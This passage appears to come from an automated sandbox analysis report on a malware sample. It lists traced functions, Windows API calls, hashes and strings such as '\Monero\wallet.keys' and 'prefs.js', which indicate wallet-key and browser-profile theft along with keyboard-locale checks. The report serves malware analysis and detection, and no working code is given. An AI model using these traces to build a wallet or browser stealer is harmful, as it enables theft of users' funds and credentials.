                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$8
                              • API String ID: 180737720-3893450896
                              • Opcode ID: dc4c48b083d717f6f996fbd0cfc4a9761a6923be16b9ca9fca2b4d2dba0b6e2a
                              • Instruction ID: 0d3ac7b946bfaaca42c63d7ab5a53a10850950e810a6d9aca1a80b5107c3b576
                              • Opcode Fuzzy Hash: dc4c48b083d717f6f996fbd0cfc4a9761a6923be16b9ca9fca2b4d2dba0b6e2a
                              • Instruction Fuzzy Hash: DC5130B2900618ABCB25EBA0DC85FFA737CBB68300F40458CB65D96040DB75DB85CFA1
                              Function 001BED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 001BED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 001BED55
                              • StrCmpCA.SHLWAPI(?,001D1538), ref: 001BEDAB
                              • StrCmpCA.SHLWAPI(?,001D153C), ref: 001BEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001BF2AE
                              • FindClose.KERNEL32(000000FF), ref: 001BF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 433e6ac9139e19aa528c09b12cc028784d1ca9ba36e8693b34f6e3fde3a09bfd
                              • Instruction ID: 63ce4d29cf81aca99e85008fcc2faf0f71e7f0dfaf67febb93e31f160df8a2cc
                              • Opcode Fuzzy Hash: 433e6ac9139e19aa528c09b12cc028784d1ca9ba36e8693b34f6e3fde3a09bfd
                              • Instruction Fuzzy Hash: EDE19A7191111CAADB56EB60DC52FEE7378AF74305F80459DB50A62092EF30AF8ACF52
                              Function 001BF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001D15B8,001D0D96), ref: 001BF71E
                              • StrCmpCA.SHLWAPI(?,001D15BC), ref: 001BF76F
                              • StrCmpCA.SHLWAPI(?,001D15C0), ref: 001BF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001BFAB1
                              • FindClose.KERNEL32(000000FF), ref: 001BFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 0acf9501d0d8256988c86da1b8b5916ab2b0d66a1520ab5e5c6bf289b010d6b4
                              • Instruction ID: aed31aa6a699baaf7fef0eda5f33f944887c7251839b6222910d23a4d83c1c28
                              • Opcode Fuzzy Hash: 0acf9501d0d8256988c86da1b8b5916ab2b0d66a1520ab5e5c6bf289b010d6b4
                              • Instruction Fuzzy Hash: 62B112719002189BDB25FB60DC96FED7379AF74304F8085ADE40A97151EF31AB4ACB92
                              Function 001B16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001D510C,?,?,?,001D51B4,?,?,00000000,?,00000000), ref: 001B1923
                              • StrCmpCA.SHLWAPI(?,001D525C), ref: 001B1973
                              • StrCmpCA.SHLWAPI(?,001D5304), ref: 001B1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001B1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 001B1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001B1E20
                              • FindClose.KERNEL32(000000FF), ref: 001B1E32
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 5d1912e8b03b963a57162ae954215733f7df48496f300a3215cce8467f45e8f1
                              • Instruction ID: 73d127a9d42eb22324a05927efd7bf7b7312e1289147229352b39180291fd00a
                              • Opcode Fuzzy Hash: 5d1912e8b03b963a57162ae954215733f7df48496f300a3215cce8467f45e8f1
                              • Instruction Fuzzy Hash: D012CE7195011CABDB16EB60DCA6FEE7378AF74305F80419DA50A62191EF30AF89CF91
                              Function 001BDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,001D0C2E), ref: 001BDE5E
                              • StrCmpCA.SHLWAPI(?,001D14C8), ref: 001BDEAE
                              • StrCmpCA.SHLWAPI(?,001D14CC), ref: 001BDEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001BE3E0
                              • FindClose.KERNEL32(000000FF), ref: 001BE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 51d52ea6c86000893956d2f98b1917ce64609a0ce792947b6f7373bf82df7d70
                              • Instruction ID: 98b36ef440e06bd8fff0cfd8f982ae8a8941fd8134f3563a0af5118a40bf8d6e
                              • Opcode Fuzzy Hash: 51d52ea6c86000893956d2f98b1917ce64609a0ce792947b6f7373bf82df7d70
                              • Instruction Fuzzy Hash: F6F1697195411C9BDB26EB60DC96FEE7378AF74305FC0419EA40A62091EF30AB4ACF56
                              Function 001BDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001D14B0,001D0C2A), ref: 001BDAEB
                              • StrCmpCA.SHLWAPI(?,001D14B4), ref: 001BDB33
                              • StrCmpCA.SHLWAPI(?,001D14B8), ref: 001BDB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001BDDCC
                              • FindClose.KERNEL32(000000FF), ref: 001BDDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 0a0fae13375446e3ca4cd1547a3e2bea7224080bc085f39dbccb8fcba7e4a3a2
                              • Instruction ID: bbf7203429b433a61fc5eb09905b2ab8f3638916d54a4234fd3e1049d5cb097e
                              • Opcode Fuzzy Hash: 0a0fae13375446e3ca4cd1547a3e2bea7224080bc085f39dbccb8fcba7e4a3a2
                              • Instruction Fuzzy Hash: C6910372900208A7CB15FBB0ED56EED777DAFA4304F80855CE90A96181EF35DB19CB92
                              Function 00584FDE Relevance: 12.4, Strings: 9, Instructions: 1124COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: +oSu$1rsF$<{x_$A6?7$D<qk$TZ,C$rZT8$~5y~$}v
                              • API String ID: 0-2430177226
                              • Opcode ID: 43ea3571ec6be97b8b1fcfcfd04bcdd33d12903e1705cf2420e5e2b93848a46e
                              • Instruction ID: 1b751b870aca7e6a4a446e9ef00c0ecfe6b5a8d1c62e5b74a8fd2891a1002041
                              • Opcode Fuzzy Hash: 43ea3571ec6be97b8b1fcfcfd04bcdd33d12903e1705cf2420e5e2b93848a46e
                              • Instruction Fuzzy Hash: F87224F3A08200AFD3046E29EC8567AFBE5EFD4720F1A893DE6C587744EA3558058797
                              Function 001C7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,001D05AF), ref: 001C7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 001C7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 001C7C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 001C7C62
                              • LocalFree.KERNEL32(00000000), ref: 001C7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 6536340e0dc76fc4e020ae0d3aeb5d9aaa22ed4c20b5fcddd42abd62fbbcec0d
                              • Instruction ID: cbded19b7ee6ff832c5bd20cab857a94b93d5350f9f88471432ae1934397ee71
                              • Opcode Fuzzy Hash: 6536340e0dc76fc4e020ae0d3aeb5d9aaa22ed4c20b5fcddd42abd62fbbcec0d
                              • Instruction Fuzzy Hash: BA416D7194021CABCB25DB94DC99FEEB378FF64704F604199E40A62280DB74AF85CFA1
                              Function 001BE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,001D0D73), ref: 001BE4A2
                              • StrCmpCA.SHLWAPI(?,001D14F8), ref: 001BE4F2
                              • StrCmpCA.SHLWAPI(?,001D14FC), ref: 001BE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001BEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 575b8e90be598b6252d2c536ba42750db2fbef9dd36b51e1a96f1daad9fda3d2
                              • Instruction ID: 3d9718465b08323226e79d2871f77be04c85e42022c5b7dd042d89e6016ba771
                              • Opcode Fuzzy Hash: 575b8e90be598b6252d2c536ba42750db2fbef9dd36b51e1a96f1daad9fda3d2
                              • Instruction Fuzzy Hash: 06121D7191011CABDB16FB60DCA6FED7378AF74304F8041ADA50A96191EF34AF49CB92
                              Function 00589C6C Relevance: 9.2, Strings: 6, Instructions: 1661COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &X/p$.o$1o{$Fs}$HS_X$fS}
                              • API String ID: 0-4075491589
                              • Opcode ID: c04104917282296cf35df845905893d257e070242cc869497933a0cfd44856cf
                              • Instruction ID: 7e3e80f31f3f9b4a7b4348c8423758b11d57e8ab4cfdae86bde37640dc250001
                              • Opcode Fuzzy Hash: c04104917282296cf35df845905893d257e070242cc869497933a0cfd44856cf
                              • Instruction Fuzzy Hash: 53B2F7F3A0C204AFE3046E29EC8567ABBE9EF94720F16493DE6C4D3744E63598058797
                              Function 0057FA49 Relevance: 9.1, Strings: 6, Instructions: 1620COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
